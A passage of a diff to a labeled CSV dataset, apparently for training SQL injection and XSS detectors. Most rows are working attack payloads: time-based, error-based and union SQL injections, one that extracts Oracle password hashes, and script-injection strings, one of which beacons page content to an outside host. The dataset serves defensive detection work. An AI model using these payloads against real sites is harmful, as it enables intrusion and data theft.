--",2,SQLi,19874 -Select your dream wedding invitations.,0,normal,24558 -"<template draggable=""true"" ondragleave=""alert(1)"">test</template>",1,XSS,8100 -"<video draggable=""true"" ondragleave=""alert(1)"">test</video>",1,XSS,1871 -"<kbd onbeforecopy=""alert(1)"" contenteditable>test</kbd>",1,XSS,8506 -<blockquote onpointerout=alert(1)>XSS</blockquote>,1,XSS,5358 -<title onfocusout=alert(1) tabindex=1 id=x></title><input autofocus>,1,XSS,3788 -<IMG SRC=?javascript:alert(?XSS?)?,1,XSS,1676 -"1 ) ) as wufr where 5239 = 5239 or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,19349 -"<style>@keyframes x{}</style><td style=""animation-name:x"" onanimationstart=""alert(1)""></td>",1,XSS,7073 -"<thead onkeydown=""alert(1)"" contenteditable>test</thead>",1,XSS,1902 -"-1988 where 4597 = 4597 union all select 4597,4597,4597,4597,4597,4597--",2,SQLi,22135 -"1"" ) and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --",2,SQLi,19685 -"1"" ) ) and sleep ( 5 ) #",2,SQLi,20762 -"{""id"":null,""firstName"":""Mee Siew"",""lastName"":""Huong"",""address"":""7 Tarrytown Rd"",""city"":""382"",""telephone"":""4868469413""}",0,normal,25524 -<template onpointermove=alert(1)>XSS</template>,1,XSS,4823 -"1' ) as xhmm where 8092 = 8092 union all select null,null,null--",2,SQLi,19370 -1' where 2389 = 2389 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,13732 -"<body draggable=""true"" ondrag=""alert(1)"">test</body>",1,XSS,8761 -<h1 onpointerenter=alert(1)>XSS</h1>,1,XSS,2493 -Select the correct answer from the options.,0,normal,24226 -select * from users where id = 1 &@ or 1 = 1 -- 1,2,SQLi,11680 -Create a blog.,0,normal,23076 -"1 ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( 1624 = 1624",2,SQLi,17321 -<script>alert(‘XSS’)</script>,1,XSS,9273 -"select count ( * ) from generate_series ( 1,5000000 ) and ""%"" = """,2,SQLi,14725 -"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,20300 -<input4 onpointerenter=alert(1)>XSS</input4>,1,XSS,3317 -<x contenteditable onfocus=alert(1)>focus this!,1,XSS,9323 -<frameset><frame onload=alert(1)>,1,XSS,7347 -"1' ) ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( ( 'mexd' like 'mexd",2,SQLi,17245 -"<del onbeforepaste=""alert(1)"" contenteditable>test</del>",1,XSS,1979 -"AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11314 -"1"" ) where 5298 = 5298 and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4386 = 4386 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) --",2,SQLi,14702 -Can you help me decide where to eat?,0,normal,23931 -"-7041"" ) ) ) union all select 2159,2159,2159,2159,2159--",2,SQLi,20373 -"<content ondblclick=""alert(1)"">test</content>",1,XSS,7110 -"<style>@keyframes slidein {}</style><abbr style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></abbr>",1,XSS,5385 -right,0,normal,23309 -Delete expired items.,0,normal,22965 -"<rp onmouseleave=""alert(1)"">test</rp>",1,XSS,5538 -"<font onclick=""alert(1)"">test</font>",1,XSS,2814 -<bgsound onpointerover=alert(1)>XSS</bgsound>,1,XSS,5653 -1'+ ( select 'kcix' where 1117 = 1117,2,SQLi,18871 -"1"" ) ) as sgln where 7573 = 7573",2,SQLi,13980 -"<map onmouseout=""alert(1)"">test</map>",1,XSS,2151 -"<main oncontextmenu=""alert(1)"">test</main>",1,XSS,2352 -select ( case when ( 8350 = 7872 ) then 8350 else 8350* ( select 8350 from information_schema.character_sets ) end ) #,2,SQLi,16424 -"1%"" ) union all select null,null,null,null,null,null,null--",2,SQLi,17099 -"1"" ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,20556 -"{""id"":null,""name"":""Golem""}",0,normal,26037 -"<listing onmousedown=""alert(1)"">test</listing>",1,XSS,8215 -"select * from users where id = 1 or ""@?"" or 1 = 1 -- 1",2,SQLi,11975 -"-9175' ) ) union all select 6174,6174,6174,6174--",2,SQLi,22515 -"<kbd onkeydown=""alert(1)"" contenteditable>test</kbd>",1,XSS,8232 -"{""id"":null,""firstName"":""Chong Lew"",""lastName"":""Teoh"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,26029 -"<style draggable=""true"" ondragend=""alert(1)"">test</style>",1,XSS,6529 -1 ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( 5281 = 5281,2,SQLi,13038 -"1 ) ) ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( ( 9184 = 9184",2,SQLi,13513 -<spacer onfocusout=alert(1) tabindex=1 id=x></spacer><input autofocus>,1,XSS,2804 -"1 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,20571 -"{""id"":null,""name"":""check ship go""}",0,normal,25726 -<noembed onpointerenter=alert(1)>XSS</noembed>,1,XSS,3994 -Where's the field defined?,0,normal,23561 -"select * from users where id = 1 + @<@# union select null,version ( ) -- 1",2,SQLi,12013 -"{""id"":null,""name"":""Tangela""}",0,normal,25283 -1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,17917 -"{""id"":null,""name"":""sentence""}",0,normal,25487 -"-4542 union all select 1249,1249,1249,1249,1249,1249,1249,1249,1249--",2,SQLi,14079 -"-4558"" or ( 3965 = 3933 ) *3933 and ""hmdb"" like ""hmdb",2,SQLi,22166 -"{""id"":null,""name"":""dear""}",0,normal,25245 -"<html onMouseDown html onMouseDown=""javascript:javascript:alert(1)""></html onMouseDown>",1,XSS,378 -"<xss draggable=""true"" ondragenter=""alert(1)"" style=display:block>test</xss>",1,XSS,63 -select pg_sleep ( 5 ) and ( 1044 = 1044,2,SQLi,16061 -"<element oncontextmenu=""alert(1)"">test</element>",1,XSS,2779 -log,0,normal,23393 -"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( 'xcnj' = 'xcnj",2,SQLi,16715 -Update your email signature with flair.,0,normal,23148 -"<rtc oncopy=""alert(1)"" contenteditable>test</rtc>",1,XSS,3913 -Insert drive.,0,normal,23225 -"1"" ) where 2312 = 2312 and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) --",2,SQLi,20759 -"1"" ) ) as chal where 6661 = 6661",2,SQLi,14069 -"`'><script>\xEF\xBF\xAEjavascript:alert(526)</script> -`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>",1,XSS,8961 -"<canvas onmouseleave=""alert(1)"">test</canvas>",1,XSS,2735 -<center id=x tabindex=1 onactivate=alert(1)></center>,1,XSS,5099 -"<title onkeyup=""alert(1)"" contenteditable>test</title>",1,XSS,3015 -"1%"" or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ""%"" = """,2,SQLi,17504 -"{""id"":null,""firstName"":""Jia"",""lastName"":""Huiz"",""address"":""1088 Pinehurst St"",""city"":""906"",""telephone"":""2544848420""}",0,normal,25976 -"1%' ) ) ) or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --",2,SQLi,21435 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23",2,SQLi,11032 -"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ( ( ( 4537 = 4537",2,SQLi,16944 -"1%' ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( '%' = '",2,SQLi,15808 -"<element onmouseleave=""alert(1)"">test</element>",1,XSS,7908 -Insert photo.,0,normal,23255 -"select * from users where id = 1 or ""{?"" or 1 = 1 -- 1",2,SQLi,11935 -"1"" ) ) ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,21540 -"1"" ) and 2006 = 2006",2,SQLi,22482 -<option onpointerout=alert(1)>XSS</option>,1,XSS,1960 -"<command onkeydown=""alert(1)"" contenteditable>test</command>",1,XSS,8883 -"<h1 onmousedown=""alert(1)"">test</h1>",1,XSS,3412 -"<BR SIZE=""&{javascript:alert(1)}"">",1,XSS,706 -"1%' ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,13687 -<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus>,1,XSS,3129 -"1'|| ( select 'ozki' where 4435 = 4435 ( select ( case when ( 4587 = 4587 ) then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 ) end ) from ( values ( 0 ) ) ) ) ||'",2,SQLi,13154 -{s,2,SQLi,22631 -I need to select the best photo for the album.,0,normal,23953 -Delete the page.,0,normal,23067 -"1"" ) where 7588 = 7588 waitfor delay '0:0:5'--",2,SQLi,21661 -"1%"" ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ""%"" = """,2,SQLi,15669 -select * from users where id = '1' <@&1 or 1 = 1 -- 1',2,SQLi,11671 -&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;,1,XSS,1323 -Select the right answer.,0,normal,24489 -"-2125"" ) ) or 8571 = 8571--",2,SQLi,20044 -"1' and elt ( 1210 = 1210,sleep ( 5 ) )",2,SQLi,16801 -Select the perfect outfit for the occasion.,0,normal,24223 -"<menu oncontextmenu=""alert(1)"">test</menu>",1,XSS,2044 -"<body onpagehide=navigator.sendBeacon('//https://ssl.portswigger-labs.net/',document.body.innerHTML)>",1,XSS,84 --4518 where 8023 = 8023 or 6872 = 6872--,2,SQLi,21746 -"-4711%"" ) ) union all select 6737,6737,6737,6737#",2,SQLi,22255 -Where's the fire department?,0,normal,23692 -<del id=x tabindex=1 onbeforeactivate=alert(1)></del>,1,XSS,4050 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))--",2,SQLi,10714 -"ORDER BY 1,SLEEP(5),3,4#",2,SQLi,10480 -"<abbr onmouseout=""alert(1)"">test</abbr>",1,XSS,6280 -"1' ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( 'swfj' like 'swfj",2,SQLi,17123 --6353%' ) ) or 3440 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3440 = 3440 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( '%' = ',2,SQLi,21130 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#",2,SQLi,10855 -<em id=x tabindex=1 onfocus=alert(1)></em>,1,XSS,6370 -"1"" ) where 9656 = 9656 and sleep ( 5 ) --",2,SQLi,21725 -"1' ) ) as orvy where 7270 = 7270 union all select null,null,null,null,null,null,null,null#",2,SQLi,15295 -She picked up some groceries from the market.,0,normal,23927 -waitfor delay '0:0:5' and ( ( 7619 = 7619,2,SQLi,14414 -onError,1,XSS,9659 -"<script src=""javascript:alert(3)""></script> // IE6, O11.01?, OM10.1?//[""'`-->]]>]</div>",1,XSS,9243 -"<footer oncut=""alert(1)"" contenteditable>test</footer>",1,XSS,2155 -"<datalist oncopy=""alert(1)"" contenteditable>test</datalist>",1,XSS,5083 -"<mark onclick=""alert(1)"">test</mark>",1,XSS,7919 -"1'+ ( select 'tzey' where 4491 = 4491 union all select null,null,null,null,null,null,null,null--",2,SQLi,18761 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) and ( '%' = '",2,SQLi,12550 -"javascript:""/*\""/*'/*--></title></textarea></style></noscript></template></noembed></script><<script>/*` /*<frame src=javascript:/**/alert()//><</script>",1,XSS,9539 -"1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( 'ochr' like 'ochr",2,SQLi,20773 -"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>",1,XSS,1456 -"<source onmousemove=""alert(1)"">test</source>",1,XSS,4242 -"<div draggable=""true"" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd>",1,XSS,7450 -"1 ) as estm where 4809 = 4809 union all select null,null,null--",2,SQLi,12930 -"<p onkeypress=""alert(1)"" contenteditable>test</p>",1,XSS,7753 -select ( case when ( 5163 = 4861 ) then 1 else 5163* ( select 5163 from master..sysdatabases ) end ) --,2,SQLi,14479 -"<bgsound onmouseup=""alert(1)"">test</bgsound>",1,XSS,5622 -"<strong onmousemove=""alert(1)"">test</strong>",1,XSS,8271 -select ( case when ( 4660 = 4660 ) then 4660 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,18739 -"{""id"":null,""firstName"":""Taufiq"",""lastName"":""Rahman"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25998 -"1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and 'nhmz' like 'nhmz",2,SQLi,13879 -"1, ( select ( case when ( 9443 = 9443 ) then sleep ( 5 ) else 9443* ( select 9443 from information_schema.character_sets ) end ) )",2,SQLi,20583 -now,0,normal,23378 -"1"" ) as bksv where 5375 = 5375",2,SQLi,18882 -"-3082"" ) where 1082 = 1082 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,22305 -"1' where 4860 = 4860 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,16468 -"<nextid onbeforepaste=""alert(1)"" contenteditable>test</nextid>",1,XSS,7178 -""",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10923 -"<details draggable=""true"" ondragleave=""alert(1)"">test</details>",1,XSS,4421 -"<blockquote draggable=""true"" ondragstart=""alert(1)"">test</blockquote>",1,XSS,4979 -"<FRAMESET><FRAME SRC=\""javascript:alert('XSS');\""></FRAMESET>",1,XSS,1259 -1' ) ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( ( 'ltki' = 'ltki,2,SQLi,21359 -"1' ) ) ) procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50 ) ) ) ) ) ,1 ) and ( ( ( 'vbda' like 'vbda",2,SQLi,16573 --3026 ) or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ),2,SQLi,13730 -"<style>@keyframes slidein {}</style><multicol style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></multicol>",1,XSS,3460 -"<style>@keyframes slidein {}</style><aside style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></aside>",1,XSS,7305 -&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;,1,XSS,1324 -"<ruby draggable=""true"" ondragend=""alert(1)"">test</ruby>",1,XSS,4692 -"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND '1337' LIKE '1337",2,SQLi,11368 -1'%2b(select*from(select(sleep(5)))a)%2b',2,SQLi,11212 -or sleep ( __TIME__ ) = ',2,SQLi,11797 -"{""id"":null,""firstName"":""Elaine"",""lastName"":""Wong"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25859 -"<em onmousedown=""alert(1)"">test</em>",1,XSS,7953 -"<div draggable=""true"" contenteditable>drag me</div><param ondrop=alert(1) contenteditable>drop here</param>",1,XSS,5028 -"1 ) and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) )",2,SQLi,18279 -1' ) and ( 7603 = 3634 ) *3634,2,SQLi,12318 -"AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=5)) AND 'i'='i",2,SQLi,11151 -<select onchange=alert(1)><option>1<option>2,1,XSS,9288 -"<rt onmouseleave=""alert(1)"">test</rt>",1,XSS,6247 -"<frameset onBlur frameset onBlur=""javascript:javascript:alert(1)""></frameset onBlur>",1,XSS,381 -"-7940%"" ) union all select 2779,2779,2779,2779,2779,2779,2779,2779,2779,2779#",2,SQLi,20354 -"<style>:target {transform: rotate(180deg);}</style><ol id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></ol>",1,XSS,2947 -OR 1=0,2,SQLi,10234 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><acronym id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></acronym>",1,XSS,1966 -%' AND 8310=8310 AND '%'=',2,SQLi,10375 -"<slot ondblclick=""alert(1)"">test</slot>",1,XSS,5039 -"<form onkeydown=""alert(1)"" contenteditable>test</form>",1,XSS,7935 -Select assist.,0,normal,24919 -"<style>:target {transform: rotate(180deg);}</style><summary id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></summary>",1,XSS,8569 -<s id=x tabindex=1 onfocusin=alert(1)></s>,1,XSS,6116 -1' where 4945 = 4945,2,SQLi,17053 -"-5732' ) union all select 7614,7614,7614,7614--",2,SQLi,17980 - or 1 = 1 --,2,SQLi,11769 -"""))) waitfor delay '0:0:20' --",2,SQLi,10987 -"{""id"":null,""firstName"":""Lim"",""lastName"":""Richard"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25776 -<applet onpointerup=alert(1)>XSS</applet>,1,XSS,4741 -1' and ( 3435 = 7210 ) *7210 and 'lxxt' = 'lxxt,2,SQLi,19235 -Select point.,0,normal,24846 -"-8279"" union all select 6598,6598,6598,6598,6598,6598,6598,6598#",2,SQLi,16118 -<command onpointermove=alert(1)>XSS</command>,1,XSS,7662 -"<progress onkeyup=""alert(1)"" contenteditable>test</progress>",1,XSS,5332 -Delete the duplicate files.,0,normal,22819 -Select a style for the haircut.,0,normal,24438 -1'|| ( select 'hbho' from dual where 7193 = 7193,2,SQLi,14033 -admin' or 1=1--,2,SQLi,9977 -"inurl:""ProductListingView""",1,XSS,9392 -Select your preferred song.,0,normal,24628 -"-3609"" ) ) as fzyp where 9474 = 9474 or 9323 = 9323#",2,SQLi,22437 -"-9237' ) union all select 7454,7454,7454,7454,7454,7454,7454,7454,7454--",2,SQLi,17101 -1'+ ( select 'uetb' where 6468 = 6468,2,SQLi,21196 -"<thead draggable=""true"" ondragenter=""alert(1)"">test</thead>",1,XSS,2989 -1 order by 1--,2,SQLi,13045 -"1%"" and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,20030 -"<summary onbeforecopy=""alert(1)"" contenteditable>test</summary>",1,XSS,7279 -<wbr id=x tabindex=1 onbeforeactivate=alert(1)></wbr>,1,XSS,3190 -"1' ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( 'yqzg' = 'yqzg",2,SQLi,21666 -"1' ) and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) and ( 'pmzp' like 'pmzp",2,SQLi,12918 -"&lt;OBJECT TYPE=\""text/x-scriptlet\"" DATA=\""http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\""&gt;&lt;/OBJECT&gt;",1,XSS,971 -"<details draggable=""true"" ondragend=""alert(1)"">test</details>",1,XSS,2509 -; alert(1);,1,XSS,1663 -"1%"" ) union all select null,null,null,null,null,null,null,null,null#",2,SQLi,13520 -"<link onmouseover=""alert(1)"">test</link>",1,XSS,2196 -<button autofocus onfocusin=alert(1)>test</button>,1,XSS,7859 -"{""id"":null,""name"":""Birdramon""}",0,normal,26025 -1 ) as jmib where 8130 = 8130 rlike ( select ( case when ( 7885 = 3932 ) then 1 else 0x28 end ) ) --,2,SQLi,19572 -"<small onbeforecopy=""alert(1)"" contenteditable>test</small>",1,XSS,7543 -UEf,2,SQLi,11818 -"<label ondblclick=""alert(1)"">test</label>",1,XSS,8507 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18",2,SQLi,10794 -select pg_sleep ( 5 ) and ( ( ( 9476 = 9476,2,SQLi,18747 -"<link onclick=""alert(1)"">test</link>",1,XSS,6707 -Please select a wedding theme.,0,normal,24586 -AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY) OR '1337'='1337,2,SQLi,11277 -1 where 8393 = 8393,2,SQLi,14232 -"1"" union all select null,null,null#",2,SQLi,13225 -"1"" ) ) ) union all select null,null,null,null,null,null--",2,SQLi,15406 --5286' or 6783 = 1233,2,SQLi,18045 --6377' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'qcms' like 'qcms,2,SQLi,17174 -"<? foo=""><script>javascript:alert(1)</script>"">",1,XSS,601 -"1 union all select null,null,null,null,null,null,null--",2,SQLi,20779 -"<applet onkeypress=""alert(1)"" contenteditable>test</applet>",1,XSS,2775 -javascript:alert(''),1,XSS,3735 -Select the right app for productivity.,0,normal,24259 -"<nav draggable=""true"" ondragstart=""alert(1)"">test</nav>",1,XSS,8193 -"1' where 6853 = 6853 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,21817 -( case when 2646 = 8520 then 2646 else null end ),2,SQLi,13107 -1'|| ( select 'yydv' from dual where 9639 = 9639,2,SQLi,17560 -I want to select a book to read.,0,normal,24079 -"1' ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ( 'ogpg' = 'ogpg",2,SQLi,16820 -Select with enthusiasm.,0,normal,24624 -"1' in boolean mode ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 ) #",2,SQLi,17664 -Select a class to improve your skills.,0,normal,24290 -"<article onbeforecut=""alert(1)"" contenteditable>test</article>",1,XSS,3040 -"<del draggable=""true"" ondragend=""alert(1)"">test</del>",1,XSS,2532 -<body onfocus=alert(1)>,1,XSS,9060 -"-7236 or make_set ( 9618 = 6919,6919 )",2,SQLi,20347 -"1%"" ) rlike sleep ( 5 ) #",2,SQLi,15440 -<i id=x tabindex=1 onfocus=alert(1)></i>,1,XSS,5710 -1' rlike sleep ( 5 ) and 'cugs' = 'cugs,2,SQLi,13641 -"1' where 4880 = 4880 and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) --",2,SQLi,17564 -<col onblur=alert(1) tabindex=1 id=x></col><input autofocus>,1,XSS,3705 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""rbqs"" = ""rbqs",2,SQLi,20384 -"1 ) ) union all select null,null#",2,SQLi,16954 +"1"" ) ) as dooq where 7911 = 7911",2,SQLi,21873 +1'+ ( select yjyp where 9696 = 9696,2,SQLi,15629 +<script>javascript:alert(1)</script\x0A,1,XSS,399 +"&lt;FRAMESET&gt;&lt;FRAME SRC=\""javascript&#058;alert('XSS');\""&gt;&lt;/FRAMESET&gt;",1,XSS,953 +"<figcaption oncontextmenu=""alert(1)"">test</figcaption>",1,XSS,2949 +<tt id=x tabindex=1 onbeforeactivate=alert(1)></tt>,1,XSS,7684 +"""),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10792 +"<ruby draggable=""true"" ondragend=""alert(1)"">test</ruby>",1,XSS,4673 +"-6073"" ) ) ) or 9502 = 2012#",2,SQLi,13135 +<aside id=x tabindex=1 onbeforedeactivate=alert(1)></aside><input autofocus>,1,XSS,7832 +"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) and 'ntaw' = 'ntaw",2,SQLi,18603 +"<rtc onbeforecopy=""alert(1)"" contenteditable>test</rtc>",1,XSS,6933 +"""))) waitfor delay '0:0:20' /*",2,SQLi,10844 <iframe/onreadystatechange=alert(1),1,XSS,844 -<kbd id=x tabindex=1 onbeforedeactivate=alert(1)></kbd><input autofocus>,1,XSS,2456 -"<hgroup draggable=""true"" ondragenter=""alert(1)"">test</hgroup>",1,XSS,7769 -"<figcaption onbeforecopy=""alert(1)"" contenteditable>test</figcaption>",1,XSS,6416 -"select sleep ( 5 ) and ( ""tlbp"" = ""tlbp",2,SQLi,13944 -<!--[if]><script>javascript:alert(1)</script -->,1,XSS,645 -"-4635"" union all select 5087,5087,5087,5087,5087,5087,5087,5087,5087,5087#",2,SQLi,15547 -<h1 onpointerleave=alert(1)>XSS</h1>,1,XSS,7483 -"&lt;IMG LOWSRC=\""javascript&#058;alert('XSS')\""&gt;",1,XSS,934 -Select the best candidate for the role.,0,normal,24315 -"1' ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ( ( 'subq' like 'subq",2,SQLi,19634 -"<col onkeyup=""alert(1)"" contenteditable>test</col>",1,XSS,8396 -<template onpointerleave=alert(1)>XSS</template>,1,XSS,6741 -"1'+ ( select 'arqt' where 2336 = 2336 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,21239 -"<abbr onbeforepaste=""alert(1)"" contenteditable>test</abbr>",1,XSS,5763 -"1"" ) ) rlike sleep ( 5 ) and ( ( ""fzlr"" = ""fzlr",2,SQLi,15194 -"<iframe onbeforecut=""alert(1)"" contenteditable>test</iframe>",1,XSS,2827 -"1"" waitfor delay '0:0:5' and ""syhx"" = ""syhx",2,SQLi,21696 -<HTML xmlns:xss>,1,XSS,9808 -"`'><script>\x21javascript:alert(1)</script> -`'><script>\xE2\x80\x82javascript:alert(1)</script>",1,XSS,550 -"<style>@keyframes x{}</style><rt style=""animation-name:x"" onanimationstart=""alert(1)""></rt>",1,XSS,8295 -"<div draggable=""true"" contenteditable>drag me</div><em ondragover=alert(1) 